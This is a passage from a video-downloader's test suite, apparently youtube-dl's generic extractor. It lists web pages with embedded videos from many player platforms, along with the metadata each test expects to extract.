'description': '联合国儿童基金会中东和北非区域大使、作曲家扎德·迪拉尼(Zade Dirani)在3月15日叙利亚冲突爆发7周年纪念日之际发布了为叙利亚谱写的歌曲《心跳》(HEARTBEAT),为受到六年冲突影响的叙利亚儿童发出强烈呐喊,呼吁世界做出共同努力,使叙利亚儿童重新获得享有正常童年生活的权利。',
'uploader': 'United Nations',
'uploader_id': '1362235914001',
'timestamp': 1489593889,
'upload_date': '20170315',
},
'add_ie': ['BrightcoveLegacy'],
},
{
# Brightcove with alternative playerID key
'url': 'http://www.nature.com/nmeth/journal/v9/n7/fig_tab/nmeth.2062_SV1.html',
'info_dict': {
'id': 'nmeth.2062_SV1',
'title': 'Simultaneous multiview imaging of the Drosophila syncytial blastoderm : Quantitative high-speed imaging of entire developing embryos with simultaneous multiview light-sheet microscopy : Nature Methods : Nature Research',
},
'playlist': [{
'info_dict': {
'id': '2228375078001',
'ext': 'mp4',
'title': 'nmeth.2062-sv1',
'description': 'nmeth.2062-sv1',
'timestamp': 1363357591,
'upload_date': '20130315',
'uploader': 'Nature Publishing Group',
'uploader_id': '1964492299001',
},
}],
},
{
# Brightcove with UUID in videoPlayer
'url': 'http://www8.hp.com/cn/zh/home.html',
'info_dict': {
'id': '5255815316001',
'ext': 'mp4',
'title': 'Sprocket Video - China',
'description': 'Sprocket Video - China',
'uploader': 'HP-Video Gallery',
'timestamp': 1482263210,
'upload_date': '20161220',
'uploader_id': '1107601872001',
},
'params': {
'skip_download': True, # m3u8 download
},
'skip': 'video rotates...weekly?',
},
{
# Brightcove:new type [2].
'url': 'http://www.delawaresportszone.com/video-st-thomas-more-earns-first-trip-to-basketball-semis',
'md5': '2b35148fcf48da41c9fb4591650784f3',
'info_dict': {
'id': '5348741021001',
'ext': 'mp4',
'upload_date': '20170306',
'uploader_id': '4191638492001',
'timestamp': 1488769918,
'title': 'VIDEO: St. Thomas More earns first trip to basketball semis',
},
},
{
# Alternative brightcove <video> attributes
'url': 'http://www.programme-tv.net/videos/extraits/81095-guillaume-canet-evoque-les-rumeurs-d-infidelite-de-marion-cotillard-avec-brad-pitt-dans-vivement-dimanche/',
'info_dict': {
'id': '81095-guillaume-canet-evoque-les-rumeurs-d-infidelite-de-marion-cotillard-avec-brad-pitt-dans-vivement-dimanche',
'title': "Guillaume Canet évoque les rumeurs d'infidélité de Marion Cotillard avec Brad Pitt dans Vivement Dimanche, Extraits : toutes les vidéos avec Télé-Loisirs",
},
'playlist': [{
'md5': '732d22ba3d33f2f3fc253c39f8f36523',
'info_dict': {
'id': '5311302538001',
'ext': 'mp4',
'title': "Guillaume Canet évoque les rumeurs d'infidélité de Marion Cotillard avec Brad Pitt dans Vivement Dimanche",
'description': "Guillaume Canet évoque les rumeurs d'infidélité de Marion Cotillard avec Brad Pitt dans Vivement Dimanche (France 2, 5 février 2017)",
'timestamp': 1486321708,
'upload_date': '20170205',
'uploader_id': '800000640001',
},
'only_matching': True,
}],
},
# ooyala video
{
'url': 'http://www.rollingstone.com/music/videos/norwegian-dj-cashmere-cat-goes-spartan-on-with-me-premiere-20131219',
'md5': '166dd577b433b4d4ebfee10b0824d8ff',
'info_dict': {
'id': 'BwY2RxaTrTkslxOfcan0UCf0YqyvWysJ',
'ext': 'mp4',
'title': '2cc213299525360.mov', # that's what we get
'duration': 238.231,
},
'add_ie': ['Ooyala'],
},
{
# ooyala video embedded with http://player.ooyala.com/iframe.js
'url': 'http://www.macrumors.com/2015/07/24/steve-jobs-the-man-in-the-machine-first-trailer/',
'info_dict': {
'id': 'p0MGJndjoG5SOKqO_hZJuZFPB-Tr5VgB',
'ext': 'mp4',
'title': '"Steve Jobs: Man in the Machine" trailer',
'description': 'The first trailer for the Alex Gibney documentary "Steve Jobs: Man in the Machine."',
'duration': 135.427,
},
'params': {
'skip_download': True,
},
'skip': 'movie expired',
},
# ooyala video embedded with http://player.ooyala.com/static/v4/production/latest/core.min.js
{
'url': 'http://wnep.com/2017/07/22/steampunk-fest-comes-to-honesdale/',
'info_dict': {
'id': 'lwYWYxYzE6V5uJMjNGyKtwwiw9ZJD7t2',
'ext': 'mp4',
'title': 'Steampunk Fest Comes to Honesdale',
'duration': 43.276,
},
'params': {
'skip_download': True,
}
},
# embed.ly video
{
'url': 'http://www.tested.com/science/weird/460206-tested-grinding-coffee-2000-frames-second/',
'info_dict': {
'id': '9ODmcdjQcHQ',
'ext': 'mp4',
'title': 'Tested: Grinding Coffee at 2000 Frames Per Second',
'upload_date': '20140225',
'description': 'md5:06a40fbf30b220468f1e0957c0f558ff',
'uploader': 'Tested',
'uploader_id': 'testedcom',
},
# No need to test YoutubeIE here
'params': {
'skip_download': True,
},
},
# funnyordie embed
{
'url': 'http://www.theguardian.com/world/2014/mar/11/obama-zach-galifianakis-between-two-ferns',
'info_dict': {
'id': '18e820ec3f',
'ext': 'mp4',
'title': 'Between Two Ferns with Zach Galifianakis: President Barack Obama',
'description': 'Episode 18: President Barack Obama sits down with Zach Galifianakis for his most memorable interview yet.',
},
# HEAD requests lead to endless 301, while GET is OK
'expected_warnings': ['301'],
},
# RUTV embed
{
'url': 'http://www.rg.ru/2014/03/15/reg-dfo/anklav-anons.html',
'info_dict': {
'id': '776940',
'ext': 'mp4',
'title': 'Охотское море стало целиком российским',
'description': 'md5:5ed62483b14663e2a95ebbe115eb8f43',
},
'params': {
# m3u8 download
'skip_download': True,
},
},
# TVC embed
{
'url': 'http://sch1298sz.mskobr.ru/dou_edu/karamel_ki/filial_galleries/video/iframe_src_http_tvc_ru_video_iframe_id_55304_isplay_false_acc_video_id_channel_brand_id_11_show_episodes_episode_id_32307_frameb/',
'info_dict': {
'id': '55304',
'ext': 'mp4',
'title': 'Дошкольное воспитание',
},
},
# SportBox embed
{
'url': 'http://www.vestifinance.ru/articles/25753',
'info_dict': {
'id': '25753',
'title': 'Прямые трансляции с Форума-выставки "Госзаказ-2013"',
},
'playlist': [{
'info_dict': {
'id': '370908',
'title': 'Госзаказ. День 3',
'ext': 'mp4',
}
}, {
'info_dict': {
'id': '370905',
'title': 'Госзаказ. День 2',
'ext': 'mp4',
}
}, {
'info_dict': {
'id': '370902',
'title': 'Госзаказ. День 1',
'ext': 'mp4',
}
}],
'params': {
# m3u8 download
'skip_download': True,
},
},
# Myvi.ru embed
{
'url': 'http://www.kinomyvi.tv/news/detail/Pervij-dublirovannij-trejler--Uzhastikov-_nOw1',
'info_dict': {
'id': 'f4dafcad-ff21-423d-89b5-146cfd89fa1e',
'ext': 'mp4',
'title': 'Ужастики, русский трейлер (2015)',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 153,
}
},
# XHamster embed
{
'url': 'http://www.numisc.com/forum/showthread.php?11696-FM15-which-pumiscer-was-this-%28-vid-%29-%28-alfa-as-fuck-srx-%29&s=711f5db534502e22260dec8c5e2d66d8',
'info_dict': {
'id': 'showthread',
'title': '[NSFL] [FM15] which pumiscer was this ( vid ) ( alfa as fuck srx )',
},
'playlist_mincount': 7,
# This forum does not allow <iframe> syntaxes anymore
# Now HTML tags are displayed as-is
'skip': 'No videos on this page',
},
# Embedded TED video
{
'url': 'http://en.support.wordpress.com/videos/ted-talks/',
'md5': '65fdff94098e4a607385a60c5177c638',
'info_dict': {
'id': '1969',
'ext': 'mp4',
'title': 'Hidden miracles of the natural world',
'uploader': 'Louie Schwartzberg',
'description': 'md5:8145d19d320ff3e52f28401f4c4283b9',
}
},
# nowvideo embed hidden behind percent encoding
{
'url': 'http://www.waoanime.tv/the-super-dimension-fortress-macross-episode-1/',
'md5': '2baf4ddd70f697d94b1c18cf796d5107',
'info_dict': {
'id': '06e53103ca9aa',
'ext': 'flv',
'title': 'Macross Episode 001 Watch Macross Episode 001 onl',
'description': 'No description',
},
},
# arte embed
{
'url': 'http://www.tv-replay.fr/redirection/20-03-14/x-enius-arte-10753389.html',
'md5': '7653032cbb25bf6c80d80f217055fa43',
'info_dict': {
'id': '048195-004_PLUS7-F',
'ext': 'flv',
'title': 'X:enius',
'description': 'md5:d5fdf32ef6613cdbfd516ae658abf168',
'upload_date': '20140320',
},
'params': {
'skip_download': 'Requires rtmpdump'
},
'skip': 'video gone',
},
# francetv embed
{
'url': 'http://www.tsprod.com/replay-du-concert-alcaline-de-calogero',
'info_dict': {
'id': 'EV_30231',
'ext': 'mp4',
'title': 'Alcaline, le concert avec Calogero',
'description': 'md5:61f08036dcc8f47e9cfc33aed08ffaff',
'upload_date': '20150226',
'timestamp': 1424989860,
'duration': 5400,
},
'params': {
# m3u8 downloads
'skip_download': True,
},
'expected_warnings': [
'Forbidden'
]
},
# Condé Nast embed
{
'url': 'http://www.wired.com/2014/04/honda-asimo/',
'md5': 'ba0dfe966fa007657bd1443ee672db0f',
'info_dict': {
'id': '53501be369702d3275860000',
'ext': 'mp4',
'title': 'Honda’s New Asimo Robot Is More Human Than Ever',
}
},
# Dailymotion embed
{
'url': 'http://www.spi0n.com/zap-spi0n-com-n216/',
'md5': '441aeeb82eb72c422c7f14ec533999cd',
'info_dict': {
'id': 'k2mm4bCdJ6CQ2i7c8o2',
'ext': 'mp4',
'title': 'Le Zap de Spi0n n°216 - Zapping du Web',
'description': 'md5:faf028e48a461b8b7fad38f1e104b119',
'uploader': 'Spi0n',
'uploader_id': 'xgditw',
'upload_date': '20140425',
'timestamp': 1398441542,
},
'add_ie': ['Dailymotion'],
},
# DailyMail embed
{
'url': 'http://www.bumm.sk/krimi/2017/07/05/biztonsagi-kamera-buktatta-le-az-agg-ferfit-utlegelo-apolot',
'info_dict': {
'id': '1495629',
'ext': 'mp4',
'title': 'Care worker punches elderly dementia patient in head 11 times',
'description': 'md5:3a743dee84e57e48ec68bf67113199a5',
},
'add_ie': ['DailyMail'],
'params': {
'skip_download': True,
},
},
# YouTube embed
{
'url': 'http://www.badzine.de/ansicht/datum/2014/06/09/so-funktioniert-die-neue-englische-badminton-liga.html',
'info_dict': {
'id': 'FXRb4ykk4S0',
'ext': 'mp4',
'title': 'The NBL Auction 2014',
'uploader': 'BADMINTON England',
'uploader_id': 'BADMINTONEvents',
'upload_date': '20140603',
'description': 'md5:9ef128a69f1e262a700ed83edb163a73',
},
'add_ie': ['Youtube'],
'params': {
'skip_download': True,
}
},
# MTVServices embed
{
'url': 'http://www.vulture.com/2016/06/new-key-peele-sketches-released.html',
'md5': 'ca1aef97695ef2c1d6973256a57e5252',
'info_dict': {
'id': '769f7ec0-0692-4d62-9b45-0d88074bffc1',
'ext': 'mp4',
'title': 'Key and Peele|October 10, 2012|2|203|Liam Neesons - Uncensored',
'description': 'Two valets share their love for movie star Liam Neesons.',
'timestamp': 1349922600,
'upload_date': '20121011',
},
},
# YouTube embed via <data-embed-url="">
{
'url': 'https://play.google.com/store/apps/details?id=com.gameloft.android.ANMP.GloftA8HM',
'info_dict': {
'id': '4vAffPZIT44',
'ext': 'mp4',
'title': 'Asphalt 8: Airborne - Update - Welcome to Dubai!',
'uploader': 'Gameloft',
'uploader_id': 'gameloft',
'upload_date': '20140828',
'description': 'md5:c80da9ed3d83ae6d1876c834de03e1c4',
},
'params': {
'skip_download': True,
}
},
# YouTube <object> embed
{
'url': 'http://www.improbable.com/2017/04/03/untrained-modern-youths-and-ancient-masters-in-selfie-portraits/',
'md5': '516718101ec834f74318df76259fb3cc',
'info_dict': {
'id': 'msN87y-iEx0',
'ext': 'webm',
'title': 'Feynman: Mirrors FUN TO IMAGINE 6',
'upload_date': '20080526',
'description': 'md5:0ffc78ea3f01b2e2c247d5f8d1d3c18d',
'uploader': 'Christopher Sykes',
'uploader_id': 'ChristopherJSykes',
},
'add_ie': ['Youtube'],
},
# Camtasia studio
{
'url': 'http://www.ll.mit.edu/workshops/education/videocourses/antennas/lecture1/video/',
'playlist': [{
'md5': '0c5e352edabf715d762b0ad4e6d9ee67',
'info_dict': {
'id': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final',
'title': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final - video1',
'ext': 'flv',
'duration': 2235.90,
}
}, {
'md5': '10e4bb3aaca9fd630e273ff92d9f3c63',
'info_dict': {
'id': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final_PIP',
'title': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final - pip',
'ext': 'flv',
'duration': 2235.93,
}
}],
'info_dict': {
'title': 'Fenn-AA_PA_Radar_Course_Lecture_1c_Final',
}
},
# Flowplayer
{
'url': 'http://www.handjobhub.com/video/busty-blonde-siri-tit-fuck-while-wank-6313.html',
'md5': '9d65602bf31c6e20014319c7d07fba27',
'info_dict': {
'id': '5123ea6d5e5a7',
'ext': 'mp4',
'age_limit': 18,
'uploader': 'www.handjobhub.com',
'title': 'Busty Blonde Siri Tit Fuck While Wank at HandjobHub.com',
}
},
# Multiple brightcove videos
# https://github.com/ytdl-org/youtube-dl/issues/2283
{
'url': 'http://www.newyorker.com/online/blogs/newsdesk/2014/01/always-never-nuclear-command-and-control.html',
'info_dict': {
'id': 'always-never',
'title': 'Always / Never - The New Yorker',
},
'playlist_count': 3,
'params': {
'extract_flat': False,
'skip_download': True,
}
},
# MLB embed
{
'url': 'http://umpire-empire.com/index.php/topic/58125-laz-decides-no-thats-low/',
'md5': '96f09a37e44da40dd083e12d9a683327',
'info_dict': {
'id': '33322633',
'ext': 'mp4',
'title': 'Ump changes call to ball',
'description': 'md5:71c11215384298a172a6dcb4c2e20685',
'duration': 48,
'timestamp': 1401537900,
'upload_date': '20140531',
'thumbnail': r're:^https?://.*\.jpg$',
},
},
# Wistia embed
{
'url': 'http://study.com/academy/lesson/north-american-exploration-failed-colonies-of-spain-france-england.html#lesson',
'md5': '1953f3a698ab51cfc948ed3992a0b7ff',
'info_dict': {
'id': '6e2wtrbdaf',
'ext': 'mov',
'title': 'paywall_north-american-exploration-failed-colonies-of-spain-france-england',
'description': 'a Paywall Videos video from Remilon',
'duration': 644.072,
'uploader': 'study.com',
'timestamp': 1459678540,
'upload_date': '20160403',
'filesize': 24687186,
},
},
{
'url': 'http://thoughtworks.wistia.com/medias/uxjb0lwrcz',
'md5': 'baf49c2baa8a7de5f3fc145a8506dcd4',
'info_dict': {
'id': 'uxjb0lwrcz',
'ext': 'mp4',
'title': 'Conversation about Hexagonal Rails Part 1',
'description': 'a Martin Fowler video from ThoughtWorks',
'duration': 1715.0,
'uploader': 'thoughtworks.wistia.com',
'timestamp': 1401832161,
'upload_date': '20140603',
},
},
# Wistia standard embed (async)
{
'url': 'https://www.getdrip.com/university/brennan-dunn-drip-workshop/',
'info_dict': {
'id': '807fafadvk',
'ext': 'mp4',
'title': 'Drip Brennan Dunn Workshop',
'description': 'a JV Webinars video from getdrip-1',
'duration': 4986.95,
'timestamp': 1463607249,
'upload_date': '20160518',
},
'params': {
'skip_download': True,
}
},
# Soundcloud embed
{
'url': 'http://nakedsecurity.sophos.com/2014/10/29/sscc-171-are-you-sure-that-1234-is-a-bad-password-podcast/',
'info_dict': {
'id': '174391317',
'ext': 'mp3',
'description': 'md5:ff867d6b555488ad3c52572bb33d432c',
'uploader': 'Sophos Security',
'title': 'Chet Chat 171 - Oct 29, 2014',
'upload_date': '20141029',
}
},
# Soundcloud multiple embeds
{
'url': 'http://www.guitarplayer.com/lessons/1014/legato-workout-one-hour-to-more-fluid-performance---tab/52809',
'info_dict': {
'id': '52809',
'title': 'Guitar Essentials: Legato Workout—One-Hour to Fluid Performance | TAB + AUDIO',
},
'playlist_mincount': 7,
},
# TuneIn station embed
{
'url': 'http://radiocnrv.com/promouvoir-radio-cnrv/',
'info_dict': {
'id': '204146',
'ext': 'mp3',
'title': 'CNRV',
'location': 'Paris, France',
'is_live': True,
},
'params': {
# Live stream
'skip_download': True,
},
},
# Livestream embed
{
'url': 'http://www.esa.int/Our_Activities/Space_Science/Rosetta/Philae_comet_touch-down_webcast',
'info_dict': {
'id': '67864563',
'ext': 'flv',
'upload_date': '20141112',
'title': 'Rosetta #CometLanding webcast HL 10',
}
},
# Another Livestream embed, without 'new.' in URL
{
'url': 'https://www.freespeech.org/',
'info_dict': {
'id': '123537347',
'ext': 'mp4',
'title': 're:^FSTV [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
},
'params': {
# Live stream
'skip_download': True,
},
},
# LazyYT
{
'url': 'https://skiplagged.com/',
'info_dict': {
'id': 'skiplagged',
'title': 'Skiplagged: The smart way to find cheap flights',
},
'playlist_mincount': 1,
'add_ie': ['Youtube'],
},
# Cinchcast embed
{
'url': 'http://undergroundwellness.com/podcasts/306-5-steps-to-permanent-gut-healing/',
'info_dict': {
'id': '7141703',
'ext': 'mp3',
'upload_date': '20141126',
'title': 'Jack Tips: 5 Steps to Permanent Gut Healing',
}
},
# Cinerama player
{
'url': 'http://www.abc.net.au/7.30/content/2015/s4164797.htm',
'info_dict': {
'id': '730m_DandD_1901_512k',
'ext': 'mp4',
'uploader': 'www.abc.net.au',
'title': 'Game of Thrones with dice - Dungeons and Dragons fantasy role-playing game gets new life - 19/01/2015',
}
},
# embedded viddler video
{
'url': 'http://deadspin.com/i-cant-stop-watching-john-wall-chop-the-nuggets-with-th-1681801597',
'info_dict': {
'id': '4d03aad9',
'ext': 'mp4',
'uploader': 'deadspin',
'title': 'WALL-TO-GORTAT',
'timestamp': 1422285291,
'upload_date': '20150126',
},
'add_ie': ['Viddler'],
},
# Libsyn embed
{
'url': 'http://thedailyshow.cc.com/podcast/episodetwelve',
'info_dict': {
'id': '3377616',
'ext': 'mp3',
'title': "The Daily Show Podcast without Jon Stewart - Episode 12: Bassem Youssef: Egypt's Jon Stewart",
'description': 'md5:601cb790edd05908957dae8aaa866465',
'upload_date': '20150220',
},
'skip': 'All The Daily Show URLs now redirect to http://www.cc.com/shows/',
},
# jwplayer YouTube
{
'url': 'http://media.nationalarchives.gov.uk/index.php/webinar-using-discovery-national-archives-online-catalogue/',
'info_dict': {
'id': 'Mrj4DVp2zeA',
'ext': 'mp4',
'upload_date': '20150212',
'uploader': 'The National Archives UK',
'description': 'md5:8078af856dca76edc42910b61273dbbf',
'uploader_id': 'NationalArchives08',
'title': 'Webinar: Using Discovery, The National Archives’ online catalogue',
},
},
# jwplayer rtmp
{
'url': 'http://www.suffolk.edu/sjc/live.php',
'info_dict': {
'id': 'live',
'ext': 'flv',
'title': 'Massachusetts Supreme Judicial Court Oral Arguments',
'uploader': 'www.suffolk.edu',
},
'params': {
'skip_download': True,
},
'skip': 'Only has video a few mornings per month, see http://www.suffolk.edu/sjc/',
},
# Complex jwplayer
{
'url': 'http://www.indiedb.com/games/king-machine/videos',
'info_dict': {
'id': 'videos',
'ext': 'mp4',
'title': 'king machine trailer 1',
'description': 'Browse King Machine videos & audio for sweet media. Your eyes will thank you.',
'thumbnail': r're:^https?://.*\.jpg$',
},
},
{
# JWPlayer config passed as variable
'url': 'http://www.txxx.com/videos/3326530/ariele/',
'info_dict': {
'id': '3326530_hq',
'ext': 'mp4',
'title': 'ARIELE | Tube Cup',
'uploader': 'www.txxx.com',
'age_limit': 18,
},
'params': {
'skip_download': True,
}
},
{
# JWPlatform iframe
'url': 'https://www.mediaite.com/tv/dem-senator-claims-gary-cohn-faked-a-bad-connection-during-trump-call-to-get-him-off-the-phone/',
'md5': 'ca00a040364b5b439230e7ebfd02c4e9',
'info_dict': {
'id': 'O0c5JcKT',
'ext': 'mp4',
'upload_date': '20171122',
'timestamp': 1511366290,
'title': 'Dem Senator Claims Gary Cohn Faked a Bad Connection During Trump Call to Get Him Off the Phone',
},
'add_ie': [JWPlatformIE.ie_key()],
},
{
# Video.js embed, multiple formats
'url': 'http://ortcam.com/solidworks-урок-6-настройка-чертежа_33f9b7351.html',
'info_dict': {
'id': 'yygqldloqIk',
'ext': 'mp4',
'title': 'SolidWorks. Урок 6 Настройка чертежа',
'description': 'md5:baf95267792646afdbf030e4d06b2ab3',
'upload_date': '20130314',
'uploader': 'PROстое3D',
'uploader_id': 'PROstoe3D',
},
'params': {
'skip_download': True,
},
},
{
# Video.js embed, single format
'url': 'https://www.vooplayer.com/v3/watch/watch.php?v=NzgwNTg=',
'info_dict': {
'id': 'watch',
'ext': 'mp4',
'title': 'Step 1 - Good Foundation',
'description': 'md5:d1e7ff33a29fc3eb1673d6c270d344f4',
},
'params': {
'skip_download': True,
},
},
# rtl.nl embed
{
'url': 'http://www.rtlnieuws.nl/nieuws/buitenland/aanslagen-kopenhagen',
'playlist_mincount': 5,
'info_dict': {
'id': 'aanslagen-kopenhagen',
'title': 'Aanslagen Kopenhagen',
}
},
# Zapiks embed
{
'url': 'http://www.skipass.com/news/116090-bon-appetit-s5ep3-baqueira-mi-cor.html',
'info_dict': {
'id': '118046',
'ext': 'mp4',
'title': 'EP3S5 - Bon Appétit - Baqueira Mi Corazon !',
}
},
# Kaltura embed (different embed code)
{
'url': 'http://www.premierchristianradio.com/Shows/Saturday/Unbelievable/Conference-Videos/Os-Guinness-Is-It-Fools-Talk-Unbelievable-Conference-2014',
'info_dict': {
'id': '1_a52wc67y',
'ext': 'flv',
'upload_date': '20150127',
'uploader_id': 'PremierMedia',
'timestamp': int,
'title': 'Os Guinness // Is It Fools Talk? // Unbelievable? Conference 2014',
},
},
# Kaltura embed with single quotes
{
'url': 'http://fod.infobase.com/p_ViewPlaylist.aspx?AssignmentID=NUN8ZY',
'info_dict': {
'id': '0_izeg5utt',
'ext': 'mp4',
'title': '35871',
'timestamp': 1355743100,
'upload_date': '20121217',
'uploader_id': '[email protected]',
},
'add_ie': ['Kaltura'],
},
{
# Kaltura embedded via quoted entry_id
'url': 'https://www.oreilly.com/ideas/my-cloud-makes-pretty-pictures',
'info_dict': {
'id': '0_utuok90b',
'ext': 'mp4',
'title': '06_matthew_brender_raj_dutt',
'timestamp': 1466638791,
'upload_date': '20160622',
},
'add_ie': ['Kaltura'],
'expected_warnings': [
'Could not send HEAD request'
],
'params': {
'skip_download': True,
}
},
{
# Kaltura embedded, some fileExt broken (#11480)
'url': 'http://www.cornell.edu/video/nima-arkani-hamed-standard-models-of-particle-physics',
'info_dict': {
'id': '1_sgtvehim',
'ext': 'mp4',
'title': 'Our "Standard Models" of particle physics and cosmology',
'description': 'md5:67ea74807b8c4fea92a6f38d6d323861',
'timestamp': 1321158993,
'upload_date': '20111113',
'uploader_id': 'kps1',
},
'add_ie': ['Kaltura'],
},
{
# Kaltura iframe embed
'url': 'http://www.gsd.harvard.edu/event/i-m-pei-a-centennial-celebration/',
'md5': 'ae5ace8eb09dc1a35d03b579a9c2cc44',
'info_dict': {
'id': '0_f2cfbpwy',
'ext': 'mp4',
'title': 'I. M. Pei: A Centennial Celebration',
'description': 'md5:1db8f40c69edc46ca180ba30c567f37c',
'upload_date': '20170403',
'uploader_id': 'batchUser',
'timestamp': 1491232186,
},
'add_ie': ['Kaltura'],
},
{
# Kaltura iframe embed, more sophisticated
'url': 'http://www.cns.nyu.edu/~eero/math-tools/Videos/lecture-05sep2017.html',
'info_dict': {
'id': '1_9gzouybz',
'ext': 'mp4',
'title': 'lecture-05sep2017',
'description': 'md5:40f347d91fd4ba047e511c5321064b49',
'upload_date': '20170913',
'uploader_id': 'eps2',
'timestamp': 1505340777,
},
'params': {
'skip_download': True,
},
'add_ie': ['Kaltura'],
},
{
# meta twitter:player
'url': 'http://thechive.com/2017/12/08/all-i-want-for-christmas-is-more-twerk/',
'info_dict': {
'id': '0_01b42zps',
'ext': 'mp4',
'title': 'Main Twerk (Video)',
'upload_date': '20171208',
'uploader_id': '[email protected]',
'timestamp': 1512713057,
},
'params': {
'skip_download': True,
},
'add_ie': ['Kaltura'],
},
# referrer protected EaglePlatform embed
{
'url': 'https://tvrain.ru/lite/teleshow/kak_vse_nachinalos/namin-418921/',
'info_dict': {
'id': '582306',
'ext': 'mp4',
'title': 'Стас Намин: «Мы нарушили девственность Кремля»',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 3382,
'view_count': int,
},
'params': {
'skip_download': True,
},
},
# ClipYou (EaglePlatform) embed (custom URL)
{
'url': 'http://muz-tv.ru/play/7129/',
# Not checking MD5 as sometimes the direct HTTP link results in 404 and HLS is used
'info_dict': {
'id': '12820',
'ext': 'mp4',
'title': "'O Sole Mio",
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 216,
'view_count': int,
},
'params': {
'skip_download': True,
},
'skip': 'This video is unavailable.',
},
# Pladform embed
{
'url': 'http://muz-tv.ru/kinozal/view/7400/',
'info_dict': {
'id': '100183293',
'ext': 'mp4',
'title': 'Тайны перевала Дятлова • 1 серия 2 часть',
'description': 'Документальный сериал-расследование одной из самых жутких тайн ХХ века',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 694,
'age_limit': 0,
},
'skip': 'HTTP Error 404: Not Found',
},
# Playwire embed
{
'url': 'http://www.cinemablend.com/new/First-Joe-Dirt-2-Trailer-Teaser-Stupid-Greatness-70874.html',
'info_dict': {
'id': '3519514',
'ext': 'mp4',
'title': 'Joe Dirt 2 Beautiful Loser Teaser Trailer',
'thumbnail': r're:^https?://.*\.png$',
'duration': 45.115,
},
},
# 5min embed
{
'url': 'http://techcrunch.com/video/facebook-creates-on-this-day-crunch-report/518726732/',
'md5': '4c6f127a30736b59b3e2c19234ee2bf7',
'info_dict': {
'id': '518726732',
'ext': 'mp4',
'title': 'Facebook Creates "On This Day" | Crunch Report',
'description': 'Amazon updates Fire TV line, Tesla\'s Model X spotted in the wild',
'timestamp': 1427237531,
'uploader': 'Crunch Report',
'upload_date': '20150324',
},
'params': {
# m3u8 download
'skip_download': True,
},
},
# Crooks and Liars embed
{
'url': 'http://crooksandliars.com/2015/04/fox-friends-says-protecting-atheists',
'info_dict': {
'id': '8RUoRhRi',
'ext': 'mp4',
'title': "Fox & Friends Says Protecting Atheists From Discrimination Is Anti-Christian!",
'description': 'md5:e1a46ad1650e3a5ec7196d432799127f',
'timestamp': 1428207000,
'upload_date': '20150405',
'uploader': 'Heather',
},
},
# Crooks and Liars external embed
{
'url': 'http://theothermccain.com/2010/02/02/video-proves-that-bill-kristol-has-been-watching-glenn-beck/comment-page-1/',
'info_dict': {
'id': 'MTE3MjUtMzQ2MzA',
'ext': 'mp4',
'title': 'md5:5e3662a81a4014d24c250d76d41a08d5',
'description': 'md5:9b8e9542d6c3c5de42d6451b7d780cec',
'timestamp': 1265032391,
'upload_date': '20100201',
'uploader': 'Heather',
},
},
# NBC Sports vplayer embed
{
'url': 'http://www.riderfans.com/forum/showthread.php?121827-Freeman&s=e98fa1ea6dc08e886b1678d35212494a',
'info_dict': {
'id': 'ln7x1qSThw4k',
'ext': 'flv',
'title': "PFT Live: New leader in the 'new-look' defense",
'description': 'md5:65a19b4bbfb3b0c0c5768bed1dfad74e',
'uploader': 'NBCU-SPORTS',
'upload_date': '20140107',
'timestamp': 1389118457,
},
'skip': 'Invalid Page URL',
},
# NBC News embed
{
'url': 'http://www.vulture.com/2016/06/letterman-couldnt-care-less-about-late-night.html',
'md5': '1aa589c675898ae6d37a17913cf68d66',
'info_dict': {
'id': 'x_dtl_oa_LettermanliftPR_160608',
'ext': 'mp4',
'title': 'David Letterman: A Preview',
'description': 'A preview of Tom Brokaw\'s interview with David Letterman as part of the On Assignment series powered by Dateline. Airs Sunday June 12 at 7/6c.',
'upload_date': '20160609',
'timestamp': 1465431544,
'uploader': 'NBCU-NEWS',
},
},
# UDN embed
{
'url': 'https://video.udn.com/news/300346',
'md5': 'fd2060e988c326991037b9aff9df21a6',
'info_dict': {
'id': '300346',
'ext': 'mp4',
'title': '中一中男師變性 全校師生力挺',
'thumbnail': r're:^https?://.*\.jpg$',
},
'params': {
# m3u8 download
'skip_download': True,
},
'expected_warnings': ['Failed to parse JSON Expecting value'],
},
# Brightcove URL in single quotes
{
'url': 'http://www.sportsnet.ca/baseball/mlb/sn-presents-russell-martin-world-citizen/',
'md5': '4ae374f1f8b91c889c4b9203c8c752af',
'info_dict': {
'id': '4255764656001',
'ext': 'mp4',
'title': 'SN Presents: Russell Martin, World Citizen',
'description': 'To understand why he was the Toronto Blue Jays’ top off-season priority is to appreciate his background and upbringing in Montreal, where he first developed his baseball skills. Written and narrated by Stephen Brunt.',
'uploader': 'Rogers Sportsnet',
'uploader_id': '1704050871',
'upload_date': '20150525',
'timestamp': 1432570283,
},
},
# Kinja embed
{
'url': 'http://www.clickhole.com/video/dont-understand-bitcoin-man-will-mumble-explanatio-2537',
'info_dict': {
'id': '106351',
'ext': 'mp4',
'title': 'Don’t Understand Bitcoin? This Man Will Mumble An Explanation At You',
'description': 'Migrated from OnionStudios',
'thumbnail': r're:^https?://.*\.jpe?g$',
'uploader': 'clickhole',
'upload_date': '20150527',
'timestamp': 1432744860,
}
},
# SnagFilms embed
{
'url': 'http://whilewewatch.blogspot.ru/2012/06/whilewewatch-whilewewatch-gripping.html',
'info_dict': {
'id': '74849a00-85a9-11e1-9660-123139220831',
'ext': 'mp4',
'title': '#whilewewatch',
}
},
# AdobeTVVideo embed
{
'url': 'https://helpx.adobe.com/acrobat/how-to/new-experience-acrobat-dc.html?set=acrobat--get-started--essential-beginners',
'md5': '43662b577c018ad707a63766462b1e87',
'info_dict': {
'id': '2456',
'ext': 'mp4',
'title': 'New experience with Acrobat DC',
'description': 'New experience with Acrobat DC',
'duration': 248.667,
},
},
# BrightcoveInPageEmbed embed
{
'url': 'http://www.geekandsundry.com/tabletop-bonus-wils-final-thoughts-on-dread/',
'info_dict': {
'id': '4238694884001',
'ext': 'flv',
'title': 'Tabletop: Dread, Last Thoughts',
'description': 'Tabletop: Dread, Last Thoughts',
'duration': 51690,
},
},
# Brightcove embed, with no valid 'renditions' but valid 'IOSRenditions'
# This video can't be played in browsers if Flash is disabled and the UA is set to iPhone, which is actually a false alarm
{
